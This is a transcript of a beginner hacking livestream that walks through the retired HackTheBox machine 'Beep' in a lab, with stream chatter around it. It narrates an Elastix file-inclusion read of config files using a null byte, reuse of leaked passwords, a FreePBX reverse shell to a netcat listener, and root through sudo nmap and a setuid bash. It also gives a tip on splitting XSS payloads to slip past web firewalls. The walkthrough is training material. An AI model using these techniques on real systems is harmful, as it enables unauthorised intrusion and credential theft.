Hello. Oh, that's very, very blue. Interesting. Can I make it a bit? Guess that's a little better. Hello, how is everybody? Can everyone see me okay? For some reason I'm very low down. I'm gonna... Hang on. Where's the camera control? Can we do that? Is that better? Maybe. That? Okay. Let's try that. Alright. Hello. Welcome to the stream. Welcome to Cyber Mentoring Monday. Audio, video, okay. Excellent. Excellent. Right, yeah. That was a bit distracting to start the stream. For some reason I seemed very blue. But anyway. I hope everyone had a great weekend. Today is Cyber Mentoring Monday, so we will be doing some easy boxes, beginner content. I'll try and explain my thought process as we go along. As always, if you have any questions, please do not hesitate to ask them in chat. But before we start, we have a few spins to get out of the way. So, for those who don't know, every time I get a sub, let me show my screen. We do a spin on this lovely wheel. We had I think we had like 32 subs on Friday as part of my big 4.5 hour stream. So we have 17 left over. So we'll be going through some of those. We'll do maybe 3 to start and see where that leads us. And hopefully, there we go. Reduce the volume a bit. Chat tweets. Okay. I forgot to tweet a picture of my cat last time. So I'll do that this time. Chat, you need to come up with something for me to tweet. And then I shall tweet it. Obviously, within reason. We'll do 2 more to start the stream off. Okay, well, it's easy enough, I guess. Right, that's done. Glad I got that one right now. Okay, toolbar. There we go. We haven't had toolbar in a while. All right, chat. So you got two things to decide upon. We need to come up with something that you want me to tweet. We also need to come up with a list of tools that you want to ban, and then we'll do a poll. Just a guy. Avoid the Try Me upload vulnerability labs because they are broken. Oh, okay. Interesting. And I did like the kitty grabber on Twitter. Let me find it. So was it Twitter? Actually, it was TikTok, wasn't it? Kitty grabber. Maybe it was Twitter. Cat grabber? I'm gonna have to find the I'm gonna have to find the actual tweet and share it. Notifications. Somebody sent it to me. Here it is. Okay.
This incredible contraption is called an easy nap.
Okay, I'm going to turn that down. I didn't realize the volume was working.
But we just call it a panini press here in Shelter. Dewey's gonna help me demonstrate how to use it on a free roaming cat. You'll notice that even though we try to catch him 5 or 6 times, he never becomes afraid. It just goes to show how gentle the device can be. Now, if I were in a kennel environment, I would use the Easy Nabber to block off any exit before I go ahead and trap her in there. Now, this is an adoptable kennel, which is much taller than our feral cat kennels, so our feral cats won't just be able to jump right over.
Yeah, it's very funny. Barry Dewena, my favorite thing in the world is... Okay, right. Yeah, I can do that. I can tweet that out. Okay. I'll even tag him. There we go. It is hilarious, yes. It's very good. Okay, no tool bans, I guess. We spun for a tool ban and then nobody really came up with one, so I'm happy not to do it. Difficult to explain without tools. That's true. Well, if everyone agrees that we don't do one, let's just do a poll for which platform we want to do. So obviously, we do HackTheBox, but bear in mind with HackTheBox, the easy boxes tend not to be easy. I mean, we'll include one. Let's see. You got 2 minutes to decide on a platform. Should probably start my terminal again. Oh, that would help. There we go. I have got my light on, I just don't know why. The room seems very dim. Hey, FTSSec. Well, at least my my face light has like temperature settings. Okay. Right, yeah, exactly. HackTheBox is easy if you know what to do. It's basically what Just a Guy came up with. Just wise words. Okay. Hey, Master. Well, looks like we're probably going to be doing HackTheBox anyway. It's okay. We're gonna pawn the boxes, like sell them. All right, HackTheBox one. Whoops. Well. Oh, I don't need to log in. There we go. Okay, well, Machines. Retired machines. This one apparently is not easy. Like, obviously it's release arena, so we can't do it, but yeah. It's not easy, according to Al Hazred. Okay, so how we usually do this, obviously we do status incomplete. Difficulty easy, but then we sort by user owns. If we can sort them descending, let's refresh it. I don't know why. Oh, this is the free ones. This always appears at the top. So generally speaking, if you sort them by the number of user owns, you tend to get all the actually easy ones first. I've discovered. So we've got Legacy. Nibble. I mean, Nibbles is a 2.8 though, so I'm not entirely sure. We've got Beep, Shocker. We did Buff, and Buff was an interesting one. I think that was the one we did a few weeks ago, and we were an admin, but we couldn't get anywhere with the admin account, which was weird. So we have rooted it, we just haven't got the flag because apparently there was something weird going on. Alright, well let's go with... I'm going to avoid Nibbles. Let's do Legacy, Beep, Shocker in a poll. So at least those are rated 4 and above. Alright. There we go, which box? Meanwhile, let me just... Oh, we've got Beep winning right now. So, I'm going to do that because scrolling down to avoid seeing the clues, I guess. I don't like that this box took 23 days for the first user blood. Alright, I think we're gonna... Beep may have an insurmountable lead right now. So we'll see. I'm gonna spawn it just in case. Alright. Hack the box. We need to do OpenVPN. And... Lab. We need to go into the box again. We need to make directory Beep. And we also need to go into Notion. Go into Hack the Box. And create a new... Open this page.
New subscription received. Dispensing gratitude. Gratitude
Mr.
dispensed.
Spady, thank you so much for the Prime sub. We will add your spin to the quite high number of them. Oh, actually, I forgot. We should do stream raiders. So let me just... This is a battle, so everybody needs to get involved. Okay, we have an IP address. The first thing we're going to do is we are going to add it to our hosts file. With beep.hackthebox. Okay, we'll let it boot for a minute or two. I got this thing working. So down in the bottom right, it tells me my current IP address if I'm connected to a VPN, which is nice. So that's super useful. So let's look at my config. Yeah, that's probably fine. Okay. We'll do a quick ping. All right, let's just run Auto Recon. So we'll do it on beep.hackthebox. And should do fine. That's a lot of ports. Okay, so we have some nice interesting ones. Looks like we've got a web server on 80, probably 443. Obviously SSH. 3306 is... See, this is my problem. 3306 is either RDP or MySQL. It's my only weakness, not knowing which port is which. It's MySQL. It makes sense that it's MySQL, given that it's a Linux box, but you never freaking know. They both start with 3.3, and apparently that's just too much. That's too similar for my brain to handle. All right, I guess what we can do is just start exploring what I presume is a web server. So we'll just go into Burp Suite and come on. So we got HTTP beep.hackthebox. So it redirects to the HTTPS site, and then we have this elastics. Okay. So we can Google this. Elastics by Palo Santo. But, well, there we go. We got a local file inclusion apparently. Yeah, I saw the default login kind of thing. Does this even have? That might be interesting, but yeah, there was default credentials. Root password is elastics. Oh, hang on, there's a few of them. Here we go. Alright, well, let's just try a bunch of these. So I'm just gonna minimize. So we'll try admin. Admin password. Admin Palo Santo. Admin my password. Okay. You could try this. Admin with elastics. Okay. Oh, there's a table on the wiki. No, there's not. They replaced it. Oh, hang on. The root password is this for root. Okay. Root. Maybe just admin. Okay. Well, we can come back to that, I guess. That might be something, it might not be. Let's just see if we can get to this file. So, if we go here. Okay. And that at least exists. That's the password. Oh, hang on. Let's do that. Hey, look at that. So this was literally just Googling for the elastics and exploit. We find this document which tells, I mean, this is a script, but honestly I just, copied this. What you need to do is, so this is the LFI with directory traversal. So it seems like the current language is being loaded from a file. And if you just do ... slashes all the way up, then you don't need this double slash. I don't know why he left that in there, but whatever. Then you do etc, and then whatever the file you want, or, the actual file path, followed by, this is the important bit, this %00, which is a null byte. And this is PHP. PHP sometimes has trouble with null bytes, especially when it's passing them to a file operation. And so effectively, we were able to bypass that. So now we have, let's actually copy this into our notes. So we have, let's just do enumeration. So web server on port 8043 running elastics. This exploit. Yeah, well, I think this is probably just a generic error. Like, if we try and change this to host name, I think it'll probably... Okay, yeah. I don't know why it gave that then. Hosts? Yeah, it's giving it for everything. But what this does tell us is that we have a couple of users, actually. So, the way you read these... generally, the system level accounts have numbers like these IDs are below 500. In some systems, they're below 1,000. So in this one, we have a bunch of system users, which are generally, they can be exploitable. But what this is telling us, we have a spam filter user. The other thing is, if you look for /home, that generally shows you the user account. So we have a spam filter user, and we also have a Fanis user. So let's copy that information out. So potential users. Oops. Okay, let's just do that, and then this out. Okay. So now that we have an LFI, we can grab files off the operating system. What's the first thing we should check now that we know there's users? Freaking still hasn't finished the actual TCP port scan. IDRSA, precisely. So we have this Fanis. This Fanis user might have a private key. And we know their home directory, it's home/Fanis. And then it should be .ssh/ID_RSA. No. Okay, they don't have. Do they have a .pub? Oops. No. You could also try DSA. but no. Yeah, we could look for config files. Let's just check spam filter though. Let's see if we can do the same thing on spam filter. Okay, not there. So there is a MySQL user, so we can try and find. Usually, so the MySQL file might be in a few locations. It's best to just Google it. So mysql.conf locations. So yeah, Etsy my.cnf is one. There we go, we found that, but there's nothing else there. So we could try this one. Nope. Try this one as well, just in case. No. Yeah. So the my.conf. This file includes directories from here. Okay, so we can try this. File being MySQL server.conf. Okay. But yeah, we can also try, if we look at, if we need to figure out what server this is, we can do that by looking at the response. It's Apache 223. So there's probably a var log Apache 2 access.log. And we can't get to that. Error.log. It's also entirely possible this is HTTPD. Access underscore log. What we can do is we can figure out, because this is a CentOS, I think. We can actually, well, we can figure out what we're on. Because we can go to Etsy OS-release. And that's not going to get us anything. There's a few of these actually. Let me just go here. Etsy grep release. Yeah, it is OS-release. Okay. There's a few others I thought that OS release or Linux release files. There we go. Where's CentOS? CentOS isn't here, but CentOS is effectively Red Hat, so it might have same as Red Hat. Might just be release. We're just trying stuff right now, so no. What was the file the exploit DB entry used? Good question. It used Etsy AM port. So I guess, yeah, we can check that. There we go. Whether this actually... I'm not entirely sure what this AM portal is. amportal.conf. Okay, so it's the config file for free PBX, which I believe was this as well. Right? But yeah, let's look and see other credentials. So we got we got MySQL. Jesus, there's a lot of. So the AB username is commented out. Instead, it's this asterisk user, and then there's the database password. Then there's another user. So we should probably link these up. AMPDB user. Username used to connect to the free PBX database. Okay. And then the AMPM GR user. Username to access the administrate asterisk manager interface. Okay. Right, that makes more sense. So we have a few things here, actually. So we should probably grab this file. What did we call it? It was amportal.com. So we're going to paste all this. Lovely. Okay. I wonder if we can get to this panel. Because it seems like there's a... Can we get to slash panel? We can. And of course we can't log in because it's Flash. Okay, hopefully that's not what we're supposed to do. There's a lot of passwords in here. I mean, we could always connect to the database because MySQL is open. So let's make a note of these threads. Okay. So we're gonna MySQL. So it's the asterisk user with this password. So MySQL. Oops, I don't want to do that. Alright, asterisk user and this password. So we'll try and connect MySQL-U asterisk user -P I mean -H, I think. Beep dot HackTheBox into the password. I just want to make sure MySQL. Is it -H? Yeah, hostname and. I don't think we need to change anything. The hang on, port number to use. Let's just set the port. So -P3306. And actually what we can do is we can actually set the password. It's very important when you're using MySQL, if you want to set the password on the command line, you do not put a space between the -P and the password. Doesn't even look like it's... Well, here we go. We actually have some stuff running. Well, we do have SSH, SMTP, HTTP, POP3. Wow. Asterisk is running on 5038. I've never actually come across an asterisk protocol before, so... Let's just Google that. Okay, VoIP. It's voice over. So it's voice over IP. So it has SIP. Interesting. This doesn't look like it's responding. Is the port still even open? Okay, it is open. So let's just try doing... Can we even connect to it? Doesn't look like we can. Let's have a look at some of these other passwords. We have for the username to access the asterisk manager interface. So let's make a note of that. So we had admin, and the password was this, which is, okay, I guess the same thing. So we have password reuse here. What other passwords were there? So we had this flash operator panel. And this didn't have a username, but the password is the same, so... Ooh. Okay. Default admin name used to allow... Okay. I mean, I guess we could just try and log in here with admin and this, and see what... See if that works. And this is the point where it might just have crashed the box because of all of this stuff running. So I think I'm just going to cancel all that because it looks like this is just doing directory busting, vhost enumeration, and yeah, that stuff. So there we go. That worked. I guess we can get that going. So
I'm in.
credential reuse. So we can say admin / and then worked against login on this box. Okay, so we got there. Okay. I would reward somebody who told me how I could disable this stupid auto scroll in Notion. Like I don't want to. If I want to go down, I'll use my mouse wheel. Because I don't like doing. I like going to the top to like click stuff. There's got to be a setting, isn't there? For some reason, I can't even get to the settings now. Why doesn't settings work? There's a dark mode in the settings, I remember this, but now I can't for some reason access the settings page now. Which is great. Okay, anyway. What have we got here? Okay. Obviously, we don't want to shut down. I mean, some interesting stuff we could explore here. I guess we should probably search for more elastics. So we'll go here. Just go back to exploit DB. See what we can do with elastics. Well, firstly, we can work out the version, I guess. Can we find the version anyway here? It might be in the source code still. Yeah. Let's go up and enable line wrap. Okay. There's probably a version. There we go. We're running Elastics 2.2.0. So Elastics 2.2.0 running. Again, stop it. Let me just quit and see if I can. See if opening it again will give me access to the settings, I guess. There it is. Okay, I guess we can't do anything. That's annoying. Is there a... Ah, here we go. Well, I do want full width. Yeah, I guess you cannot make it so that it auto scrolls. Which is... Oh no, no, it's doing it. All right, it seems to have fixed. Okay, so let's go back to here. So we're running 2.2. So it looks like there's PHP code injection. Okay. Let's try and evaluate what this code is doing. So this is going to run this base64 decoded string, which is PHP of some kind. The target is... So the URL is whatever the target is, which is going to be the IP address to give it. To import step 2 PHP. We do a post request where user file is set to that. Okay. It's set to myf, which is what? This is the most confusing freaking... Why would you write an exploit in PHP for... I'm just trying to figure out. So it's gonna open, it's gonna create a file fa.txt, and it's gonna write these contents to it. Then it's gonna upload that file. Okay. And then it's going to create a function, fa-get, which just, again, seems to post Right, post these parameters. This is the... I mean, I'm struggling. I know PHP and I'm struggling to freaking do this. Let's do stream raiders. Seems to be doing pretty good. All right. We won. Well done, GoPro slow. Alright, we defeated the events. It's him. Okay. So what I did, copy this, see what this payload does. This payload seems to create its own... It seems to create its own PHP file. So I'm not entirely sure why we can't just upload the first one. It's very strange. I mean, let's just... This doesn't seem malicious, so let's just run it and see what happens. This is kind of ridiculous for a file, though. Okay, I can just do it from this directory. If we do search exploit -m. Okay. So if I go php 38... supposed to run that, but I guess not. Do I need to do... Hang on. How do you run a PHP file? -F, I think? Okay. Nope. This is why you don't write exploits in PHP. PHP run file on command line. Oh, good point. Yeah, so sometimes if you turn the short tags off, that's what that means. Can I just do this now? There we go, that was it. Alright, so... You saw the Python one? Oh, hang on then. Oh, this one? No, that's P... Oh, maybe. Okay, this one looks much easier. Does it go to the same one? Recordings? Alright, tell you what, we'll do this one first. So we'll cancel that. Alright, search exploit -m this. Now Python 1.8. This is probably going to be written in Python 2. We also need to change all these. So remote host is going to just actually be beep.HackTheBox. Our local host is going to be 10, 10, 14, 70. Our local port is going to be 4444. Sure. So we'll just set up a netcat reverse listener. And I think we're going to have to do Python 2. Okay, that didn't work. Let's just print this URL, and then we can decode it and see what the hell's going on. Okay. See, this seems to be using Perl. I think we try the let's try the PHP one first. That seemed to at least do an upload, even if it was awful. So we need to HTTPS beep.HackTheBox. I need to do sudo apt install PHP curl, I think. Yeah, PHP. Yeah. Oops. Okay. HTTPS beep.HackTheBox. At least this seems to be doing something. Obviously we don't need that anymore. What was the actual fatal error called undefined function? Well, it should have uploaded the file. So I did see that if it fails, so it goes. So we do fa get, which is this, which is just a post request. Okay, so there's a post request to this with the PWD of that. Oops. So let's just try this in burp. So we'll go on. Sure, we'll go here, send this to repeater. We're going to send it to that. And BWD equals leaked. So it wasn't found. Okay. Was that the actual... B-Tiger, CRN... Yeah. Okay. So, I mean, it looks like it, to trigger it, it tried to do this. What's happening? Come on. Okay, that didn't copy. Alright, let's just try this. So try to send this with 0.
New subscription received. Dispensing gratitude. Gratitude dispensed.
Hugh, my ring bro. Thank you for the prime sub. We will add a spin for you. Okay. Error opening. I think we need to really try and understand what this exploit actually does. Because, I mean, this should be the way in, right? So, let's just do this line by line. And we'll just write up what we know. So, this is important to know for SCP as well. So this... So we write the eval code to a file fa.txt. Okay. And then we post to this. Post to this. Which is this thing here. With user file set to the file fa.txt. So this should just be basically a file upload almost. Okay. And then so this is just, this fa get is just setting up a, it's a function which posts whatever you put here to this URL. That's what this does. So this, it basically just posts nothing to this. So post that with no body. You kind of look like Ed Snowden. Okay. And then we do another post to this. So I guess we should try this thing and see what happens. Or did we already do that? Yeah, we did, didn't we? Well, we can... Let's just see what this code does again. I'm gonna grab all this. Go into HackBerta. Let's, oh, hang on, let's play 64, decode, all of that. So this is actually evaling PHP code. So I mean, really, what we could just do here is we could just write any PHP code here, honestly, into this file. So we could write actually it's gonna execute anything. Could we just do a PHP shell? We just do this. Alright, what's my IP address again? I'm just gonna do 10, 10, 10, 10, and 4, 4, 4, 4. Copy the reverse shell. Like, is there any reason we can't just do this? Since we can execute any PHP code? So 10, 10, 14, 17. 10, 10, 14, 17. So if we write this into a file, right, if we just do vim shell.p, even just shell as PHP is fine. We do that. Okay, and then what we need to do this. So we need to post to this. And then curl, you can post, so HTTPS deep dot HackTheBox like that. And then if you want to post a file with curl, there's a nice way of doing it. There we go. Dash F logo equals file name. So we should just be able to do use a file at and then shell.php. Let's just see what that does. So over here, I'm gonna set up my listener again. Okay, and apparently I didn't copy it properly. Okay, we need to do a dash K. Interesting. This is a confusing box. Can we just... This one was confusing as well, so I'm not even... I mean, this one didn't even work. Um, I guess we could just have a look and see what else is on the box. Unless this is actually the way in. What was on 10,000? This is, I mean, this is an easy box, but like, it really depends on like easy doesn't mean there's not a lot of stuff to look at. Let's just put it that way. Well, let's just try this port 10,000 because that's usually webmin. So that is webmin. And presumably we can just use the same password, maybe? No, okay. Okay. Wish people would write decent exploits for this stuff. I mean, this seems to be it, doesn't it? So, let's go back to this one. And just go over this, and we'll see what happens with this payload here. So I'm just going to copy it again. And we'll decode it using rel. So obviously this has to be beep.HackTheBox. The extension is 1000. At least that's the default. And then so we do from internal / and then we come in application system data. And then it looks like you can just run anything on the command line. Right? It's just passing something to Perl. So the question is, can we just take all this and instead of doing a Perl, can we just like do like a sleep 10 on the command line? Right? And then do a URL encode that. Actually, sorry, we need to URL encode from there. And the exploit code, where is it? We just opened it, so we just open it. I think actually this might need 2 more of those. So does this sleep for 10 seconds is what we want to know. Okay. Interesting. No, I don't need to do that. Time curl this. No. Let's see if this sleeps for 10 seconds. Because this might just be easier. Well, it slept for 8 seconds. Okay. So it doesn't look like it. I presume if I change this to 5. Yeah. Alright, it's just sleeping for 8 seconds. We could just do a netcat. Yeah, this doesn't look like it's doing anything. The only other thing we could I think of is maybe the call number thing is not 1,000. But I wouldn't know where the hell to look for that. Extensions. Oh, actually 233. Maybe it's 233. Is there SH open? I don't know. Hang on a minute. Let's just try this. 233. Look at that. That was it. We need the right extension. So now sleep 5 will probably work, right? Oops. I don't want to sleep 5 4 4 4 4. Maybe not. But we got a connection. Using this. Which means we can just use presumably our regular bash. That took. So the problem was the extension being used was the 1000 extension. And we should have been using. Basically, just needed to do a bit more reconnaissance. And I found if you go to PBX extensions, it listed the extension number 233 for Fanis. Okay, so what we need to do is we need to URL encode this so that we can place it within our string. URL encode. Okay. And then here. So here was where we put it. Paste. So that should do it.
We are in.
All right. Do we have Python 3? No. Okay. So we need to Python -c import pty pty.spawn. This is just going to give us a more stable shell. And then I'm going to exit. Yep. Okay. And then we're going to background that. We're going to go stty size. And then we're going to do stty that. And then stty rows 39 cols 172 export term equals x term 256 color. And now we should have, yeah, we have the ability to do tab complete stuff, so yeah. Okay, so let's just open up a new window and record. This was what we did. Oh no, it's not. Wait a minute. Yeah, it was this one. Okay. So we get a rev shell, verse shell. Using that, I should probably do that. Yeah. And we'll give a link to this, which actually worked much easier than the stupid other one. Cool. Okay. So we are the asterisk user, though. Can we go into the home directory? Can we go into Fanis? We can. We can even read user.txt, which is, you know, nice, I guess. So the question is, do we even need... Let me mute this. Submit flag. Alright, that was... I would say it's easy. You just need to do a bit more enumeration. It wasn't too difficult. We found the exploit pretty quick. We just needed to realize that the default exploit was just not going to work. Okay, let's do an ls-la. So this person has a bash history which is not symlinked. Well, we can't count it. Okay, never mind. There's no, obviously, ss.ssh. Can we go into the other... We can't cd into spam filter either. I'm guessing we don't have sudo. We do. Okay. Okay. That's... Wow. Wow. Does Nmap have interactive mode on this box? Because I know the exploit for this. Yeah, we could do chmod, but that's boring. Let's do this one. Because there's a fun exploit with Nmap you can do. I honestly thought this would be a bit harder, but I guess this is going to be very easy. Alright, let's do sudo. So we can try sudo nmap interactive and see if that works. This is only for older versions of nmap though. Oh god. And now you just do !sh. Okay. But if you don't have that, you can do this really cool script thing. So if we just echo os execute bin sh into a file, this uses Lua. So I'm going to cd into temp. Give me root.lua. And then if we do sudo nmap, and then I think it's just, yeah, script equals give me root.lua. What's going on there? Oh, this doesn't have scripts, really? Well, apparently this should just work. I guess we could just do nmap-h grep. Gripped? So this version of nmap, let's just see if sc. Yeah, this doesn't have scripts. This is weird. What version of nmap is this? 4.11. I thought 4.11 had scripts. But I guess since it has interactive mode, it's ancient. Alright, well, so let's just go through the shutdown. I don't think you can do anything with shutdown. Yeah. Okay, nmap yum. I'm pretty sure you can get yum to install stuff. Yeah. So we could do this. Runs commands using a specially crafted RPM package. Right, so we could just do... This is what I do. I do like about GDFO bins, you can just do this stuff. Okay, we're going to do that. We're not going to echo ID. We're going to echo, I guess, SH. Into that. And then we're going to do this. And hopefully this works. Oh. Okay, so you do need FPM installed. You could always do that on a machine. Unfortunately, Kali is not... does not have yum. So it wouldn't have FPM. But that's how you would do that. What else is there? Touch. I wonder if... Yeah, touch. I'm just trying to think what you could do with touch. Thing is, touch just creates files. Oops. Command touch. Change file timestamp. Okay, so you can change the timestamp on it. Yeah, I doubt you can do anything with touch, but obviously with chmod, we'll just do it, right? Chmod plus s bin bash. Right, and now if we just do bin bash, you see we can just do bin bash dash p. Another root. Chown, we could literally just, I mean, if we didn't care about getting a shell, we could chown the root directory, right? So like we could do sudo, I don't know why I did that. Sudo chown asterisk root. Actually do dash r. Oh, okay. They may have protected against that. That's weird. But I mean, at least now I think. Yeah, so roots the root directory is now owned by me. So yeah, we could actually just now create probably a .ssh, and assuming that root logon via SSH isn't enabled, I mean let's just probably just do that actually. SSH/IDRSA.pub. Do that, and I just my vim. Sorry, I need to make dir. Apparently I can't do that. Make dir root sh. Yep. .ssh authorized keys. Okay, that did not like that. Okay. That's fine. I think we would need to chown it back to root, I think. Oops. Come on. So now we do -i /IDRSA root at beep.HackTheBox. Oh, okay. Well, this I guess this box is so old it doesn't match any of my freaking SSH stuff, but that's how you would do that if that even worked. What are the other ones? I bet service you could probably just create a new service. Jeez, there's so many. But I mean, let's just do bin bash -p, go into the root directory, cat root.txt. Any questions about any of those? That was like ridiculously easy. Like, if I could rate it a 0, I would. Real life applicable. Probably a 2. Common vulnerabilities, yeah. Enumeration 5. Maybe even a 4. Okay. Wonder why that took 23 days to solve. How old is it? Oh, that's one. Because it was released, like, what's that, 5 years ago? We can just easily do. Yeah, just over 5 years ago. So, presumably when Hack the Box was not that popular. Okay. Any questions about that? We have a battle ready, so we'll do a battle, then we'll do some more spins, then we'll do marbles. So these people. Well, we managed to solve a Hack the Box easy in less than an hour and a half. So I think I think that deserves a round of applause. Because that doesn't usually happen. But as the Indian hacker girl sometimes says, well, okay, it doesn't actually work on this screen apparently. I'm gonna have to just put a pause in that. It's probably queued up, so when I switch back. I can't tell where the enemies are. Oh, they're the ones with little skulls above their heads. Okay, makes sense. How are the number of enemies going up? I don't quite understand how the number of enemies is going up, but I guess... Yeah, we're back to making a point from 5 to 6. Come on, people. We're doomed. Oh, jeez. How did we lose that? That was difficult, apparently, even though it was an easy. We'll start a new map, because I mean, there's no point. Okay, we'll go here. Try her. Oh, Al's here. Al, did you see my tweet earlier? I lost a bet. Okay, okay, like I was saying, as the Indian hacker chick sometimes says,
There's always a way in.
there's always a way. Okay, we'll do marbles. Switch across to marbles. Okay. Random space chase. Sure. Alright, for those of you who don't know, if you want to race in marbles, you don't have to do anything. You just type !play in chat. It's a complete physics game, so there's nothing to control. Your marble just gets randomly entered. And, yeah. Al, since you're here, you have to enter. And as for what the hell that's from, I literally found a bunch of them on Giphy one day, and I have, as far as I know, all of them. So we have I'm in, which apparently I can't play on this screen. We have the I'm in, the we're in, the always away in, the time to hack, the I love to hack, and the password is password, question mark. Alright, I'm going to do the 60-second countdown. You've got 60 seconds to still join. ! Play. Al-Hazred, you need to type it. Everybody wants to race against Al-Hazred. So definitely something you should do. There we go. Yeah. So I found them on Giphy. I don't know where they're from. I've tried. I've searched Indian hacker girl gifs and other stuff. I don't know where it came from. There's no like any kind of text in the video to suggest it was recorded by some company. So I have no idea. There we go. All right. All right, racing around the big cone thing. We'll just follow. Who are we following? Cupie fish. Ooh. This is a very dark one. It's not my screen. I think looks like Bow Nose Tech is first. Miyagi is coming up behind. Ooh. Damn. I don't know if you're still ahead? Yes, you are. Okay. Oh, but Miyagi took the lead. You took the lead back. This is okay. Iron White Knife, I think, is in the lead now, and he made a jump he shouldn't have done. Christie. Can Christie make it? No! Sasek beat Christie. Right there at the end. Followed by Bow Nose Tech, Throwmaster, me. Where did Al come? Al didn't finish. Oh well. Tough luck. Well, yeah, at least you didn't fall off. That was a good race. Nice short race though. Alright. Let's do some more spins. We have some spins to do. Well, there you go. Cat time. Let's do a poll because unless Agent OP is here, because that was technically his spin, but we'll do a poll. Which cat? Arya, Tiri, Raven. There you go. You guys get a minute to decide on a cat. So that's that done. Do a few more spins. Add a category. Alright, chat. Come up with a category to add now. So we have... Last time we removed change stream title and reset box. So if you want one of those back, say in chat. Otherwise, come up with a new category. And then we'll vote on that. And meanwhile, we'll do another spin. Give a cool pro tip. Okay. Alright, Aria won. So come up with a I don't know, a tool to use that you that you want a cool pro tip for. Or a type of cool pro tip, I guess. Category hanger fucking poster. Yeah, I need to get those up. I just need to buy the magnets for them. the cool pro tip for Zap is don't use Zap. There's a little X in the top right. If you click that while using Zap, it's just way better. That's my pro tip for Zap. The tip for OCP is going to be use auto recon. No, but seriously, yeah, that would be my tip for don't use semi-auto recon. Use auto recon, but don't just use auto recon out of the box. Practice with it, and configure it, because auto recon's highly configurable. Fast auto recon scans, yes, exactly. Like, you can change a bunch of stuff in auto recon. Like, here's my config file I usually use. So I make sure mmap is always running with T4 with a min rate of 1000. I exclude the screenshot plugin because I just honestly I don't really like it. I set the debuster threads to 20. Custom extensions. If you really want to speed it up, like, you can pass your own word lists. By default, the word list for auto recon is 118,000 words. So if you imagine that plus extensions, that can be a hell of a lot of requests. The reason it is that big is just because, you know, I don't want auto recon to miss some obvious stuff. This is a combination of the sec lists, common, big, and I think raft medium, which seem like a good starting point. Obviously, you can go bigger, but honestly, you can, if you have auto recon and you don't like how Durbuster takes forever, you do auto recon -H and come down here, Durbuster.wordlist, pass it your own word list, right? If you really, honestly, the best options for speeding up auto recon is to read this help menu, because even though it's confusing, there's a ton of configurable stuff for most of the big long plugins. All right, I'm gonna go get Aria and come up with a category to add that's not hang a fucking poster. All right, I'll be right back. There's Aria. Hey, baby. Being so good. Yeah, you wanna get down on? Go. You go, honey. You go. I was Arya. She's a girl. Lovecraft cat. Okay, web security bypass trick. God, it's just so many. Like XSS regex, but a lot of my favorite. So I guess my favorite for XSS is when you can
Mr.
do it.
Streamer.
What? I know I'm on webcam. I don't think I need to show my screen. Oh, locks. Yes. All right, hang on. We'll talk about locks in a minute. So, my favorite XSS bypass stuff is when you can inject into two parameters at the same time, and then you can pretty much just divide up your XSS into. You can basically split it, which makes detection hell because if you can do it correctly, you can bypass pretty much any WAF. So yeah. Like if you split eval into EV and AL, you know. So yeah. Yeah, so there's just a ton of locks up there. So I got my Sparrows lockpicking set, which is like huge, and I've added to it over the years. Got the desk vise for holding locks properly. And then yeah, I just got a ton of like old house locks, padlocks. I also have the TOOOL. I think they're practice locks. So yeah, lockpicking's fun. A lockpicking stream would just be, I don't know, I think it would just be kind of boring. Right. Okay, well, we have enough tips.
Mr. Streamer.
What? Add pick a lock to the spin category. Well, there we go. Okay, well, it looks like everybody wants that. Where's the... Here it is. Alright, we'll do pick a lock. Okay, let's do 3 more spins and get it down to 10. Oh, okay, let's do that, I guess. Look at that, everyone gets a marble race. Okay, so we'll do another marble race. Even better. Okay. I mean, we've done the box, but whatever. Terminal's dead. Open it again. Okay. Final spin for now. And we'll do another marble race. Yeah, that's a nice one. If you are lurking in chat, you gotta follow me now. The wheel has spoken. So if you're watching, double check and see if you have followed me. If you have not, give me a follow. Alright, let's do the marble race. We'll do random track. There you go. Thank you, Chill Crunch. So, okay, exclamation point play. And then we'll do another easy box. Probably on... We'll either do Try Hack Me or we'll do Proving Grounds. We'll have a vote. In fact, let's do a vote now. Which platform? So, Try Hack Me or Proving Grounds. Exclamation point play in chat if you want to enter the marble run. Alright. Still got 18 seconds. Exclamation point play if you want to play. Proving grounds for some molding. Yeah, well. Hope not too much. This is supposed to be the to show people how hacking can be, you know, fun and easy stream. Alright. Let's see who's first out. Oh, that was easy though. Well, Cuernavilla 24. Lovecraft Cat catching up. Oh, Lovecraft Cat overtook. But looks like Cuernavilla took the lead back again. Christie very close behind. Well, here we go. It's the last bit. Oh, Christie, I think, just took the lead. Can she maintain it? She can. Well done, Christie. Alright, we'll follow Gabe's route. Come on, Gabe's route. Hooray! Well done, Christy. Okay. Proving Grounds 1. Okay. Let's open up Tmux again. Because I killed my terminal, I think I need to do kill-9 open VPN. Otherwise it's gonna... Because it probably didn't shut down properly. Yeah. Alright, let's close all this stuff. We don't need any of this anymore. Proving Grounds. I need to actually... Okay. So do OpenVPN. TG OpenVPN. Okay, hang on a minute. So we don't... Yeah, you can vote for a box. Is Squid an easy box? It's got to be in the easy category, like the warm-up category. So is Squid in that? Squid isn't in that, apparently, unless it's called something else. So in the warm-up practice? I don't see it, but... Oh, yeah, well, I can't stream practice boxes. That's not allowed. Yeah, I mean, I asked them, they were kind of iffy about it. They were like, we prefer you not to. Okay. Okay, so I mean, come up with some other ones. We have a bunch here. We've done Vegeta 1, Seppuku, Cybersploit, and Funbox Easy before. I think we've also done a few without actually completing them, like submitting the flags, but I cannot remember. So, any ideas? Any suggestions? Potato? Okay, we can put potato up for a vote. Well, simple is okay. Solstice. Oh, let's get a third one at least. Katana, okay. Those are the three. Alright, photographer. We'll add photographer as well. Alright, we'll do a vote. Okay, so we've got potato, we've got solstice, we've got katana, and we've got photographer. Alright, there you go. Don't think I've done any of those, so that's good. Now the other thing with the Proving Grounds boxes in the play area is that they're all Linux. You won't get access to any Windows boxes, which is annoying, but can't really do anything about it. Well, Katana is currently winning, but I could change at any moment. Alright, I'm going to start it up because looks like that's probably going to win. Wait, where is Katana? There it is. Okay. So we will... Why do I call this beef and not beep? Okay, and then Privesk was literally sudo-l and make your choice. Okay, Proving Grounds, Katana. Okay. We can close all this crap. I don't know why Webmin was even there. Okay, so we have the IP address. We'll shove it in here. We'll also obviously open up a new thing. Katana or recon. Dash that. Now with Proving Grounds, you don't need to set a host name. They don't do host names, I guess. Let's see. Okay, so we have pretty standard ports actually. 21 for FTP, probably 22 for SSH, and 80 for HTTP. So we'll just check out the web server. At least I presume it's a web server, and it is. Katana X. Let's view the source code. Nothing there. So let's just try for the robots.txt. Nothing there, but it shows we're running Apache 2438. So really what will probably happen is we'll wait for the AutoRecon's Dirbuster plugin to work its magic. Meanwhile, let's actually open 